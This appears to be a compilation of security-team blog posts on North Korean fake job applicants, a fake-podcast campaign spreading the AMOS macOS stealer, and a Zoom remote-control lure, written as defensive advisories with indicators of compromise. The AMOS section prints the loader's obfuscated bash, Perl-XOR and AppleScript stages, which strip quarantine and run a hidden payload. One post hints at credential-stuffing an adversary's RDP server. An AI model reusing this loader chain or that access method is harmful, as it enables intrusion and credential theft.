and seems happy about it.

That is another detail that will become clear later on. Keep it in mind, together with the switched-off camera. Everything will add up in the end.

So far, for an APT (Advanced Persistent Threat), the whole engagement seemed unusually easy on our side. It felt like fencing with an inexperienced opponent each time, or as if we had an advantage no one had fully noticed yet.

I lean towards the second explanation, and since we have many loyal readers who have followed this series to this very day, I think we both deserve an ending with our very own parlour room scene (*).

(*) The classic climax where the detective gathers all suspects in a formal room (the parlour) to reveal clues, explain the crime step-by-step, and unmask the killer, solving the case.

The Manual

Many months ago, we started this series, Interview with the Chollima, after a DPRK agent posing as someone from a crypto company tried to spear-phish me into “working” for him. My supposed task was to fix a “bug” in his code, which was in reality laced with a malware called OtterCookie, which would later deploy InvisibleFerret (another malware) as his sidekick.

In that first chapter, I explained how I fully reversed the malware, played along just enough for him to believe I had taken the bait, and used that to pull him into a call where I confronted and recorded him.

But that’s not the whole story, let’s take a few steps back. While reversing the malware, I discovered several domains referenced in the code. Scanning them revealed that he was running his services with Administrator privileges, and that a port hosting Remote Desktop Protocol was also exposed on a particular domain.

In my own words from the first chapter:

“The other service running on port 7777 is Remote Desktop Protocol, which allows us to authenticate, if only we had the necessary credentials.

But that’s a story for another day”

That day is today, so here is the full story.

I tried to tease this during my talk North Korea’s Fur Shop at DEF CON 33’s Malware Village, but only a few Mexican attendees actually caught the cue and came to see me after I left the stage.

Let’s say that SWIM (Someone Who Isn’t Me) found numerous hardcoded credentials inside certain DPRK malware samples, all of them simple and predictable, and decided to try stuffing them into the Remote Desktop Protocol login window.

That SWIM got access after only a few attempts and ravaged through the filesystem like a ferret, a pretty visible one, and found some tools. Some of them were classics like OtterCookie, while others were cheaply programmed Drainers, some even containing hardcoded DB credentials to remote servers, which made dumping them trivially easy.

Let’s say that SWIM also stumbled upon a weird short document, something between a homemade manual and a set of notes from one operator to himself or another on different topics:

• How to set up their online personas and emails, strangely suggesting the use of “.dev” or “.work” in their handlers,

• Enforcing the use of specific VPN services (such as AstrillVPN) and residential proxies, resorting to VPS providers only as a last option,

• Advising them to claim they were based in Los Angeles or Texas,

• Recommending AI prompts to create “social media posts” to maintain an active online presence and build their network, and to comment on compatible job postings something like “I believe I am a good fit for this position”.

  • I was able to confirm this (strange) point by looking at a DPRK’s profile latest interactions on LinkedIn, which are public.

• Sharing a list of excuses to deal with awkward social situations, such as not speaking the language of the country they pretended to be from: “tell them you left as a child because your father worked abroad”.

Do any of these points sound familiar? If you have been following this series, probably all of them. This gave me early warning about their behaviour, and it also explains why their social media AI-slop posts, handlers (“.dev”, “-work”, “-projectname”), backstories, excuses and claimed locations are always the same among all candidates. This was their playbook, kind of.

Sadly, at no point did that short document shed any light on why they run away once they are discovered and delete all their online accounts, as I see this as a standard procedure.

But adding loathing to ridiculousness, one last point caught my eye: a suggestion that “female recruiters are easier to deal with [to fool] than male recruiters”. A bold claim, considering how a woman (Sofía) caught every single one of them live on camera. One of them was even shaking like a leaf during the interview.

I’d say she was not exactly “easy” to deal with. Speaking of which.

Fight like a girl

With internal intelligence on how they operate, my team and I moved ahead and blocked their entire toolset: the IP ranges of their VPN providers, the residential proxies they relied on, the exit nodes of their remote desktop tools, and very specific ASNs they used. I was genuinely curious to see what they would try once they realised that none of their tools or hosts could reach us anymore.

I spoke with Sofía and shared a set of canary tokens with her: links, QR codes, documents and other measures that, once opened, would privately send us all sorts of information about whoever activated them. Ideal for hunting Chollimas, Moles and other vermin.

When our north-cordobés friend joined the call, Sofía shared one of those canaries with him under a specific pretext, and he fell for it instantly, triggering it.

Easy to deal with, sure thing.

Now do you understand why she said, “Of course he’s already gone, but we got him”?

I received a notification via email about the trap being stepped on, so we started investigating.

He disappeared, but not without leaving behind an interesting trace. He was using a VPS located in Japan, although some tools place it in the United States, owned by Limestone Networks. This aligns neatly with what was described in the manual: when everything else fails, they are instructed to fall back on spinning up VPS instances. Having already blocked the providers they rely on most, this appears to have been their second choice.

The IP address itself is not important, even though it had no prior records across intelligence platforms, nor is the fact that they were using a VPS as a bouncer, which again, we already knew from the manual. The point, echoing what we have shown in previous articles, lies in their disastrous OPSEC and just how gullible they are.

That last part, them being a herd of gullible pony-heads, is particularly interesting. They will believe almost anything you tell them, which is precisely how we were able to escalate from talking to them daily on Telegram/Discord to observe them from the inside for months. During that time, we learned a great deal from their perspective, and not only on the technical side.

One detail that has stuck with me ever since, and that might explain why Lucas did not turn on his camera this time, came from an internal chat I had. It said that if you attempt to interview with a specific company whose team has a “green dragon”, “they will record your face and post it on the internet” and that was “not good”.

I am still trying to figure out what kind of monsters would do that to innocent job-seekers.

The End

This saga ends here.

The intel may be kept private, but the laughs should always be shared.

Stay safe.

Don’t hire spies.

Fight like a girl.

And don’t get rekdt.

With the same plot. The same bad guys. The same outcome.

A typical monday for us, if you may ask. So let’s begin.

A North Korean walks into an interview...

He says his name is Jesús Sebastián, from Barranquilla, Colombia, but his internet connection is awfully bad, as if he was bouncing capriciously from Asia to Europe, then to someone else’s laptop via AnyDesk.

He tried really hard to deal with the lag, but in the end we lost connection with him. Maybe he should have tried turning the router on and off again.

Just because he seemed like a totally legit guy, we’ll share his profile as well to help him find new opportunities. No profile picture though, but as you might have noticed in the tape, he’s a little shy.

He has over 7 years of experience and even claims to have worked for Microsoft as an AI & Software Engineer, an interesting flex.

All those years in AI paid off, as he also sports a good and healthy sense of handcrafted nerd humour, ideal if you want the rest of your workforce to start their days with a smile and your chat channels drowning in AI-generated memes.

These posts are absolutely organic and definitely do not come from a shared online document detailing social networking engagement guidelines and post templates to promote the appearance of organic activity.

I decided to check on him and we ended up being friends on Discord, because everybody deserves a friend.

I quickly found out his account is just 13 days old, so maybe he is new to all this Discord thing.

I’m not a fan of Discord so I asked him for his Telegram and we kept the conversation there.

Why does his profile say “Robbery”? Weird, but I’m happy to have my new friend added on all my socials so we can hang out any time. So, I’ll let that detail slip.

He then offers to check my CV for me and help me get a job. What a nice guy indeed!

Getting jobs in an easier way? I like it.

We go back to Telegram where he keeps helping me improve my poor resume. On the way, he also discloses another phone number, this time from Texas, United States.

I’m glad I met my new friend Jesús Sebastián. There is something weird, though: what I found is that he likes his own posts, maybe just because he is lonely.

Worry not, my new pony-head friend, I will get you a tonne of likes from our LinkedIn readers.

And maybe more friends too!

We are the Quetzal Team. We put the “Famous” in “Famous Chollima”.

Public IOCs

URL:https://linkedin.com/in/jesus-sebastian/

It’s Friday, so I won’t bore you with a sermon about threat actors’ tactics, techniques and procedures or indicators of veterancy, but I’ll allow myself to echo my words from our last article regarding the Kim Boys:

And if we are all together here today (once again) it means two things:

1. The previous pony-heads messed up bad.

2. A new pony-head tried to play hero. And messed up too.

There’s something bluntly kommissar-esque about this (and here I am, talking about TTPs again), as I interpret this badly-planned insistence not as persistence (like an APT) but rather as the frustration of someone higher up constantly sending one after another until someone could claim the prize. This someone wasn’t “Sebastian”… that’s for sure.

Who’s “Sebastian”? Our friend here, a “Colombian” “software engineer” “from Pereira”.

He likes doing typical colombian things like not speaking Spanish, as seen in this interview with our Talent Acquisition Specialist (who now leads the scoreboard in Whack-a-Chollima Online):

During the interview, he mumbles some passable Spanish (we’ve seen this before) but once again becomes easily cornered by his interviewer who, in real time, checked his LinkedIn profile just to find it was gone (along with his hopes of getting the job).

This is a typical behaviour I described in our last article: delete everything and run when they feel threatened or discovered.

In this economy, losing your professional profile can hit hard, so we did a good thing today by grabbing a copy of his profile before it got swept under the internet’s rug forever!

We also managed to back up his Klimb profile, just in case he ever wants to resume job hunting. We’re here to validate his skills or serve as a reference should the time come!

It was a surprise to find that he claims to speak Spanish at “native level”.

I think he overstated his capabilities, but who are we to judge?

Just looking around, we also found that he’s a loyal customer of AstrillVPN, which came as no surprise, to be honest.

We’ve also added him as a contact just in case we hear about any openings that could be a good fit.

He looks quite different on camera. Don’t worry, that happens to some people, like engineers who work a lot… and those who abuse visual filters to look like someone else…

We wanted to let him know we had his back, so we sent someone behind the enemy lines a colleague messaged him “mistakenly”.

He apologised for the out of the blue message and in no time our friend Sebastian showed him that fate works in mysterious ways, and that sometimes dialling the wrong number could take you on a new path in life, like getting offered your dream job.

He asks a couple of routine questions and whether our colleague knows anything about software development.

He proceeded to explain his plan: he has a company of 10 developers massively taking remote positions.

My colleague would have to attend job interviews and get an offer, which would ultimately be filled by one of those 10 “ghost developers”, getting him a 35% cut of the final payment and being able to make up to $8,000 per month.

Just for attending interviews and posing as Mr Charming.

Sounds too good to be true, right? For me it sounds exactly like a cornered villain explaining his evil plot just minutes before being defeated.

Or even better, like a North Korean agent explaining the villainous Famous Chollima international plot just before going viral all over the internet.

So you wanted to be a Famous Chollima? Wish granted.

You won’t be remembered as someone who mastered Cervantes’ tongue, but hey, we’ll get you a lot of views on LinkedIn!

Say hi to your next job!

Lessons Learned

If you’ve been following this series, or even if this is your first time reading it, you’ll definitely get a sense of how far this threat goes.

If you’re a developer, helping these guys out could earn you a free metal wrist from the FBI, and it’s not worth it.

If you own a company, startup, or any organisation actively looking for software engineers, be on high alert. Exercise caution, check IDs at the door, and conduct rigorous background checks.

Also, it pays to subscribe to this kind of newsletter. We worry because it’s our job to do so, and by publishing this research, you can spend more time building (doing your job) instead of worrying.

Some people may think that threat intelligence isn’t a priority, until something hits you and you don’t know where to start to understand what happened.

We are the Quetzal Team. We put the “Famous” in “Famous Chollima.”

Until next time (we know it’ll happen again).

IOCs

URL:https://linkedin.com/in/sebastian-tamayo-pro
URL:https://www.klimbup.com/perfiles/sebastian-tamayo

I'm more in the second group. A threat actor's activity can sometimes yield (or help you infer) interesting information such as their level of veterancy.

Indicators of veterancy are those that tell you "this man here, it is not his first rodeo". Look at things like staying calm under fire, kind and educated communication (especially during extortions), and overall patience. These are things that separate bunches of Discord SIM swappers from long-time criminals and APTs.

Truth be told, the only way to discover these indicators is by engaging with threat actors, and what we learnt from doing so with the Chollimas is… well, disappointing to say the least:

• Nervous: They are natural liars, and very bad ones.

  • They get nervous when questioned (like that kid the other day tweaking live on camera).

  • Their lies can’t stand basic questioning.

  • They blow up everything when fleeing (fake profiles, portfolios, their entire digital persona).

• Backup: If one of them messes up, prepare for a quick follow-up.

  • Just as we saw in our last interview, a first candidate showed up wearing exaggerated AI filters and got rejected.

  • The very same day, another one showed up wearing a lighter filter.

• One-up: If the backup plan fails, prepare to meet a bigger and nastier Chollima. Someone more experienced, confident enough to seek revenge for what you did to the other pony-heads (lovely little Chollimas).
  This happened to us thrice:

  • After the failed QRLog outbreak, where they attempted a follow-up attack a year later with another division using the same tactic and an improved malware.

  • After Interview with the Chollima I, they tried to attack me directly again, posing as a recruiter from Lockheed Martin.

  • After Interview with the Chollima III (yes, just two days ago), they sent a more senior Chollima to avenge his little pony-heads, whose faces we made viral all over the internet, including an article for HackRead.

    • And yes, this just happened less than an hour ago.

Dear readers, meet “Julián Arleby Muñoz Mendez”, Senior Chollima from the DPRK who calmly and bluntly decided to take an interview with Sofía, our Talent Acquisition Specialist, the same one that discovered his little ponies just two days ago.

“Julián” stole a resume and a portfolio from a Senior Full Stack Engineer from Colombia and tried to pose as him in order to gain a position at our company.

Born and raised in Colombia, “el señor Julián” does not speak a single word of Spanish, which is, once again, odd to say the least.

“I was sent abroad to Singapore from a young age” he states, “but I’m now once again in Colombia”.

Curious geographical choice, but I’ve seen this trick before: it is used to eventually match any timezone anomaly we could ever catch, as Singapore is in GMT+8 and North Korea in GMT+9.

Him not speaking a single Spanish word, along with the strange background story and added to the recent events, may tell us this is a dead giveaway of Chollima activity.

But for us at the Quetzal Team, who see the devil in the details, it is another thing.

Maybe, just maybe, it’s because this cattle-head stole Julián’s name, but forgot to switch identities and entered the meeting under the name “Arthur Burrus”.

An error like this is the typical indicator that this is probably not your first rodeo, but should be your last.

I hope you enjoyed this short article. We are the Quetzal Team: we put the “Famous” in “Famous Chollima”.

IOCs

URL:https://www.linkedin.com/in/julian-mendez-working0628/

Yes, the profile URL says “-working”. I’m still picturing what other reasons I would have LinkedIn for.

We all picture the future in different ways, some more optimistic, others not so much. Many people wrote about it, some foretelling great inventions or warning about social problems, whilst others chose more unrealistic fiction (at least for that time), like Philip K. Dick. He wrote about “andys”, androids whose synthetic existence mimicked that of natural humans, trying to deceive observers into accepting them as such.

I know for sure that many would have giggled at the idea at the time, but that future eventually caught up with us in a certain way. Today, it’s become commonplace to see AI being abused to generate deepfakes of influential people and to use them as puppets to promote scams or to video call their employees asking for gift cards or wire transfers.

This is a story about a couple of synthetics. Two North Korean agents who tried to land jobs with us by faking entire artificial existences, with stolen résumés and synthetic AI-powered faces.

A Famous Chollima

We spoke about Famous Chollima in the past (and even met them a couple of times). They are a division of Lazarus, a state-sponsored Advanced Persistent Threat (APT) linked to the DPRK (Democratic People’s Republic of Korea) or, simply put, North Korea.

This division specialises in corporate espionage and fund acquisition, and they do so in a creative way: by landing jobs at western companies. This grants them access to both corporate secrets and clean money, which ultimately is sent to the sanctioned regime’s coffers.

Originally, their primary targets were Software Engineering positions in the Crypto/Web3 and Financial sectors (especially Fintech), but recent reports place them in other markets like civil engineering and architecture, so it’s safe to say… nobody is entirely safe.

And this is how everything started: with a Senior Software Engineer position posted on our website. That’s when we first met our synthetics, Mateo and Alfredo.

Do Chollimas Dream of Western Jobs?

Sofía is our Talent Acquisition Specialist, and she came to us about a strange interview she’d just had with a candidate:

“He applied for the position, saying he was from Jalisco, México.

He joined the call without his camera on, so I asked him to turn it on and then he looked really weird, literally like a robot, and his mouth moved in a strange way.

I asked him if he spoke Spanish and he told me ‘no’.

I just recorded him and hung up.

Now his LinkedIn profile is gone...”

Our team investigated her recordings and, to nobody’s surprise, there it was. A North Korean agent with his face undergoing real-time AI-powered surgery to stylise his cheeks, mouth, and chin to a point where every minimal facial gesture would threaten to snap the fragile digital sutures holding the magic together.

If that wasn’t a dead giveaway, we also recorded him speaking, and as Sofía said, his mouth was shut tight, and when it moved (if it ever did), his teeth didn’t accompany the movement and his lips never modulated any of the words he was saying (like in “authentication”).

He claimed to be from Jalisco, México, having studied engineering at a Mexican university, but didn’t speak a single word of Spanish (does this ring a bell from a previous article?). In the end, we found out he’d stolen a résumé from a real engineer (along with his name) and stitched it all together, just like his fake face, to try his luck.

Armed with that information, we started writing our threat report, but just two days later, Sofía came back with more bad news:

“I think it just happened again.

This time, he didn’t look quite as robotic, but it’s the same story: an Asian man claiming to be from Chihuahua who doesn’t speak Spanish. Yet his LinkedIn says he studied engineering at the University of Chihuahua.

Very suspicious! Obviously, I hung up on him too…”

She recorded this interview as well, and we were able to see a nervous young man with subtle filtering instead of a cheap, clandestine AI facial reconstruction.

He was anxiously shaking whilst she spoke (00:00 - 00:06), as though preparing to answer her questions. When doing so, he constantly rocked his head and torso back and forth, over-gesticulating with his brows occasionally.

His nervousness is puzzling, I’m certain he’s done harder things like, according to his résumé, pursuing a highly technical engineering degree in a Spanish-speaking country… without speaking a single word of the language. Remarkable, honestly.

Sofía knew the LinkedIn profile would vanish the moment she hung up (as happened before), so she recorded that too:

With this, we pulled some strings and found out, once again, the real person this synthetic had cloned: a real engineer with a real degree, a real face, and, well, basically a real life.

That makes two North Korean infiltration attempts dodged in the same week. But to say we were lucky twice would be an understatement, as luck played no part in this tale. Sofía recognised the warning signs immediately because we’d discussed these threats before (lots of times). That’s all it took: being aware that this kind of infiltration attempt actually happens, and that we’re a constant target for them. When the impostor appeared on her call, she did what we always do: recorded everything and got the team involved immediately.

We continued our investigation and found interesting details about these runaway synthetics (as if having their faces on tape was something minor): Mateo and Alfredo were loyal customers of Astrill VPN, a popular VPN service used by Chinese users to bypass the Great Firewall, and also by DPRK IT workers to defraud companies.

Their assigned IP addresses placed them in Europe, but they were actually tunnelling through to a US-based host.

Using a residential US IP address.

Which is part of a laptop farm.

To which they jump into using a popular remote desktop tool.

You may wonder how we discovered this… but that’s a story for Interview with the Chollima IV.

Lessons learned

If you asked us a year ago about this threat, we would have said that people in the [crypto] space were in danger. Today, the financial, crypto, and even the architecture and civil engineering fields are being targeted, and soon more will be.

Ask your Compliance Team about recording interviews, don’t hesitate to involve your security team if a candidate acts suspicious, always double check your candidate’s background (these guys usurp other people’s lives and even SSNs, so triple check if possible), and check IDs at the door: ask your candidates to show an ID when they come (again, checking with your Compliance Team). All exam providers do, and their relationship with customers is a one-time one. You are here to hire someone for a little longer than that.

Outro

Returning to Philip K. Dick’s work, he described the “andys” as synthetic life-forms that mimicked real humans and were nearly impossible to distinguish from them.

But he also wrote in that same book about the “chickenheads”, humans who were simply not bright enough, struggling daily to cling to a world that constantly advances and refuses to wait for them to adapt.

I think I mislabelled our subjects in this article.

IOCs

URL:https://www.linkedin.com/in/alfredo-solares-garcia/
URL:https://www.linkedin.com/in/mateo-jimenez-aaa304379/

It’s a regular day at the support desk… until a ticket arrives, written entirely in Chinese.

The sender insists something isn’t working and attaches a compressed file with “screenshots”. But nothing is what it seems…

In this talk, Leo and Javy share their work profiling an active campaign where Chinese-speaking threat actors distribute a newly discovered malware, Zhong Stealer, through fake support tickets targeting platforms in the crypto ecosystem.

They did an excellent job turning a complex subject into an engaging and easy-to-follow story.

So here’s our talk at Nerdearla [in Spanish], hope you enjoy it!

You were going to be a crypto superstar, invited to a top-notch podcast, but instead you ended up with all your credentials being sold on darknet markets.

That could already have been a true cybercrime podcast episode, but luckily we are here to turn it into a cybercrime article and an advisory to help you avoid becoming a victim.

Let’s talk about the Fake Podcast Malware Campaign.

A fake podcast

It all started with a script we are all familiar with by now: a DM on a social platform asking people in the crypto space to join a podcast episode about themselves and the projects they are currently working on. A classic move, but if they are still pulling it out maybe it’s because it works.

After the formalities are set, the victims are lured to fake websites impersonating online meeting platforms such as StreamYard or Huddle. Once on these faux platforms, an error message is displayed saying something went wrong (either the browser is incompatible or it cannot connect to the platform) and that a desktop client should be downloaded and installed.

A DMG (a macOS application installation disk) is then downloaded, posing as either Huddle or StreamYard.

But this is, in fact, Atomic macOS Stealer, better known as AMOS, and the only thing it will connect us with is a darknet market to sell our login credentials and cookies.

Scalpel please. Time to conduct dangerous, unlicensed and semi-legal surgical practices.

Gutting out AMOS Stealer Loader

Atomic macOS Stealer, or AMOS, is an advanced information stealer aimed at swiping your login artefacts, including credentials and cookies. It was spotted being distributed via creative, up-to-date methods such as ClickFix and by mimicking trending brands and products like DeepSeek. Once deployed, say goodbye to your accounts; expect impersonation around the world and, basically, the loss of your entire digital life, from banking apps to gaming platforms.

In this case it was distributed as DMG installation files, let’s pry them open:

First things first, our threat actor forgot a .DS_Store file, which often contains valuable ‘easter eggs’, not necessarily suitable as actionable intel but rather useful settings. A strings scan shows the project was originally nicknamed infosec_hello.

See those files with weird extensions like .Iwv and .Ztz?

Those are Bash scripts disguised as something else!

Both samples contain heavily base64 obfuscated code that is later decoded and XORed via Perl:

#!/bin/bash

if false; then
    EiqLwP=701
    jMVppY=443
    vNcakstx() {
        local var=578
        return 0
    }
    ufuhgwOg() {
        local var=653
        return 0
    }
    echo 'DulhopPRRO'
fi

EmZCKs() { echo "$1" | base64 --decode; }

#[...] Snippet removed by Mauro

iRXoEI=$(echo "$ZBoaKw" | base64 --decode | perl -e 'my $key = pack("H*", "da7db7be616a94cc46357f272a1408b0"); my $data = do { local $/; <STDIN> }; my $k = length($key); for(my $i=0; $i < length($data); $i++){ print chr( ord(substr($data, $i, 1)) ^ ord(substr($key, $i % $k, 1)) ); }')
EAhJHD=$(EmZCKs "$iRXoEI")
eval "$EAhJHD" 

But what does this code do? Well, the chain is the following:

💾 DMG File > ⌨️ Bash Script >

🎭 Base64 > 🔀 Perl XOR > 🎭 Base64 > 🍏 AppleScript

So, it actually loads an AppleScript via osascript:

osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "Huddle" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".Huddle"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'

This AppleScript does the following:

• Lists mounted disks and looks for a volume name matching the lure, for example Huddle or Streamyard.

• Builds a path to a hidden file on that volume, .Huddle or .Streamyard.

  • The initial dot (.) indicates a hidden file or directory on Unix systems.

• Copies that file to /tmp/ as /tmp/.Huddle or /tmp/.Streamyard.

• Clears extended attributes with xattr -c to remove quarantine.

• Marks it executable with chmod +x.

• Executes the copied payload from /tmp.

And what exactly are those hidden files, .Huddle and .Streamyard? Those are the AMOS samples, which we are not running for… safety reasons.

But we know someone who will gladly detonate them: the CrowdStrike Sandbox.

Wear your safety goggles. We are going to blow things up.

Detonating AMOS Stealer

We submit both the Loader and the sample for detonation to see how they behave individually.

As expected, the loader itself can’t do much without the final AMOS payload. It merely prepares the environment and then waits for something that never arrives. Still, we can take a look at how it works and what it does to set the stage for its partner in crime.

On the other hand, the sample itself fires up all alerts on the platform. Every behavioural sensor, network indicator and file operation gets flagged, making it crystal clear that the payload is malicious.

That is actually good news: while the loader tries to be subtle, the final AMOS sample leaves enough noise to be reliably caught in a sandboxed environment.

In short, the stealth ends as soon as the real stealer steps in and thanks to that, we can trace its actions, extract IOCs and turn this fake podcast into actionable defence.

It’s time to stop the recording, send the raw tape to the producers, and dismiss today’s host: AMOS Stealer.

As always, do your own research, stay safe, and don’t get rekdt.

IOCs

URL:https://streamyard.ai
SHA256:69b859db7397a04bb1f1c2ff9d987686b5ce0c64ec8fc716c783ed6dd755e291
SHA256:c275252592228b51b3934a9b3932d269c2f9132caad5f51ae54216ec147a8834		
URL:https://x.com/BillyBitcoins
Domain:streamyard.ai
Domain:huddle01.com
URL:https://huddle01.com
SHA256:f7d138a4fa15215c4e747449f31b2b6b6726aed00a9cc9e3ec830df366c1437f			SHA256:af4ba47f760ae08bce49c7b7c16e9dcff7df7eff53f27abc0c2a1eee1cea6085			FilePath:Huddle.Iwv
FilePath:Streamyard.ZTz
SHA256:9665dac619c7d17a2fafd32f2df77f27dc39135d31235a748bd95ac137005e9b			
SHA256:f7fe593806aa2b2486e2052c582b1b8423b2455bf9392fa42b1d2cb6d98ca897

References

• Quetzal Team Intelligence Pulse on OTX

Malicious software reinvents itself every day, breaking down its components to the bare minimum or hiding its traffic in the most unexpected places, like DNS records.

We decided to take it a step further and created MFT, a malware strain that abuses distributed systems like Codex, Cloudflare R2 buckets, IPFS and even Google Calendar, to demonstrate how far this can go.

To the outside world, all traffic seems to originate from reputable, legitimate services, but behind the curtain, something far more evil is going on.

Here’s our talk at the Data Duplication Village at DEF CON 33, hope you enjoy it!

North Koreans, North Koreans, North Koreans. It’s all we talk about these days. So when we come across another kind of vermin Threat Actor, it feels… refreshing.

This time, everything was different: I couldn’t blame my least favourite site in the world, I couldn’t point fingers at ACME’s top customer, and I couldn’t even rip apart a malware sample.

But at least, I found a novel and creative way to compromise victims in the crypto sector. Let’s get to it.

Potential Coverage

It all started with an email from someone claiming to work at CoinMarketCap’s editorial team, wanting to write an article about our company.

It was sent to specific people within the organisation, those with slightly more exposure than the average employee.

The first thing we noticed was the fake domain: team-coinmarketcap[.]com, registered just a few days earlier, on July 26th. Naturally, my first thought was that the Pyongyang Crew wanted to have some fun and work on their score (they’re way lower on the scoreboard compared to us) so I accepted the quest. But this had nothing to do with the Kim Boyz.

I booked a call via Calendly, where they had set up a fake profile using CoinMarketCap’s branding and naming, logos included.

While waiting for the meeting to take place, I started digging into their domain.

Our first stop is LevelBlue OTX (formerly AlienVault), our favourite open threat intel exchange hub.

Here, we noticed three interesting things:

1. The website points to a private IP address (127.0.0.127), meaning it’s unreachable from anywhere and unable to serve content.

2. It was delegated to Cloudflare.

3. It was created on July 26th of this year (yes, just a few days ago).

Why buy a domain without hosting any content?

Maybe they’re hosting something else. Time to dig in (literally, using the dig tool).

Using Google’s Toolbox, we can run dig online.

dig is a utility used to query DNS entries for a given domain, and it’s pretty useful for recon and intel work.

The first thing we notice is that the NS records point to Cloudflare (a clever move).

The second thing is a couple of TXT records: one for Google verification, and another one to declare an SPF record (also for Google).

So why Google? Why SPF? These are both related to email.

When checking the MX records (also email-related), we see that this domain serves a single purpose: to send emails using that domain.

There’s a second domain, from where they send the initial contact: contact-coinmarketcap[.]com.

This one has its MX records delegated on Hostinger and its NS records on DNSOwl.

With not much else to do, I waited for the day of the interview.

And here’s what happened.

The meeting

I jumped into the Zoom meeting and met Igor and Dirk. I was posing as someone in a position to control transactions and with visibility over user activity and personal information, a shiny bait they wouldn’t let slip by.

It was clear that Igor was the frontman, doing all the talking and introducing himself as someone super tech-savvy, born in Poland and educated abroad in the US.

Dirk, on the other hand, was impersonating a real CoinMarketCap editor, using both their name and profile picture. He barely spoke, and when he did, it was only to back up something his colleague had just said.

Igor asked me something quite specific: if I could change my application’s language to Polish, because “his note-taking app would act up if not.”

He immediately tried to excuse himself, saying his English was good, but not that good.

To me, it was obvious:

a) He didn’t have an Eastern European accent, at all. And I recognise Eastern European accent for… reasons that I’ll share later.

b) He spoke fluent English, so it was odd he struggled to understand me.

c) Note-taking apps rely on your local system language or a manually set preference, not on the remote participant’s language.

He used this excuse to also ask which operating system I was using, supposedly to “better help me change the language.”

I complied, for the sake of understanding the ruse. Igor warned me that the call would drop and that I’d need to restart Zoom. It did, and after rejoining, they began setting up the questionnaire. Then, suddenly, they tried their luck.

A window popped up, displaying a message in Polish with two options, also in Polish. One of them was highlighted in blue. According to Igor, it was something related to the note-taking app. He excused himself and asked me to click the blue button to continue.

In reality, the window was a notification that a remote participant wanted to take control of my screen (a standard Zoom feature). It did include a warning about the associated risks and permissions… but all of it was written in Polish.

If I had accepted, they would have gained full access to both my mouse and keyboard and with just a few key shortcuts, could have downloaded malware, granted remote access, or even attempted to steal files or credentials.

But their luck was far worse than mine, because they didn’t take into account two basic things:

a) I was recording the whole thing.

b) My second last name… is Polish.

Zemsta

I decided to cut off communication and moved on to emit an intelligence pulse and write this article.

I’m also sharing part of our conversation here, so users and companies can be aware of this new attack vector.

As usual, stay safe out there. Reach out to your Information Security team when in doubt, and please don’t get rekt.

Indicators of Compromise

Domain:team-coinmarketcap[.]com
Domain:contact-coinmarketcap[.]com
Email:dirk@team-coinmarketcap[.]com
Email:no-reply@contact-coinmarketcap[.]com

• Intelligence Pulse on OTX

Last time we saw a Chollima was in March, when he tried to hack me using one of the most creative malwares I’ve seen lately.

He failed. We tricked him into joining a meet with me, and he was mocked and recorded.

We knew it was only a matter of time before they sent a bigger, meaner Chollima back looking for payback.

But there’s something worse than a big, bad Chollima.

And that’s two Chollimas.

Intro: Hack-A-Mole

You may think the Lazarus guys have it hard. Long working hours, a buggy boss who wants to nuke the world from time to time, some weirdos from the Quetzal Team calling you names like wet wipe or muppet, hurting your little nuky feelings. So far away is that dream life of being a government hacker superstar, working under the guise of evil cyber geniuses.

But there’s someone who has it worse. North Koreans who actually have to work for real. And I don’t mean those working in the everyday North Korean economy, I mean those Lazarus guys who actually have to hold a legit job. With a real boss. Real KPIs. Hiding from HR meetings you can’t really fake your way through, and offsites that… well, let’s say your passport might not be super cooperative about those.

These guys actually work 9 to 5 for a salary that ultimately goes to the regime. But they’re not victims. While doing so, they’ll take every single opportunity to conduct corporate espionage, and maybe even steal your funds.

These guys are the Famous Chollima division. But I’ve fallen in love with a name that takes away the glamour and fits them better:

Wage Mole(s).

The first interview: My name i-is Jo-José

I first heard of “José” the Mole after he applied for a Senior Software Engineer position at Bitso, and one of our Technical Interviewers raised an early warning, flagging the interview as suspicious.

José introduced himself as someone from Mexico, who had studied for five years at the University of Guadalajara and had over ten years in the market, working for a big pharma company, implementing HIPAA compliance from scratch, and basically acing everything related to Java, Spring Boot, and all the wizardry devs do.

But something didn’t quite add up.

“His English was good, but his Spanish, we can say, was ‘intermediate’.

There were lots of connection drops, he was having network issues.

He was an Asian-looking man.”

— Talent Acquisition Analyst

So, you lived in Mexico for years, studied a technical degree, worked over a decade in a Spanish-speaking country… and yet, your Spanish is just so-so?

We kept an eye on him. He was allowed to move forward with an async exercise as part of the interview process.

The longer he stayed in the loop, the better for everyone.

If he was genuinely applying, he’d eventually complete the process.

If he wasn’t… well, we’d keep him in the “process” for the intel.

The exercise: IllegalMoleException

The exercise was graded at 51%. For someone with that level of experience, completing an asynchronous coding challenge with such a result was more than suspicious.

The technical interviewers were asked if there was still interest in moving forward.

They all agreed, not because of his potential, but because it was a good chance to study the subject more closely.

So we advanced to a monitored live-programming session.

The second interview: The cat is under the table

“José” joined the second round and that’s when things got even weirder.

“He doesn’t speak Spanish at all, and his English is barely passable, which doesn’t match his résumé or his years of experience.

He took at least 10 minutes just to log into the collaborative coding platform, which was literally a link emailed to him, nothing complex.

I onboarded a second interviewer just to double-check I wasn’t being biased, but she thought the same.

When asked for feedback or follow-up questions, the candidate simply replied: ‘What are your ongoing projects?’, which I obviously dismissed.

He barely speaks, and when he does, it’s muttering something we can’t even understand.”

— Technical Interviewers

What happened here? Did José just take a hit to his Broca’s area and was now unable to speak English as he used to?

Was he simply having a shy day, or did the nerves get the best of him, making him forget his mother tongue?

“All of this is very weird. The interviewee disappears for minutes and doesn’t respond to emails right away.

He started off ok, but added a lot of fluff in certain classes and gave odd explanations when questioned.

He’s stuck writing mapping code instead of advancing through the exercise.

I believe he may be writing the test for someone else.”

— Technical Interviewer Notes

Or maybe, just maybe… this wasn’t José.

The backstage: Wage Moles

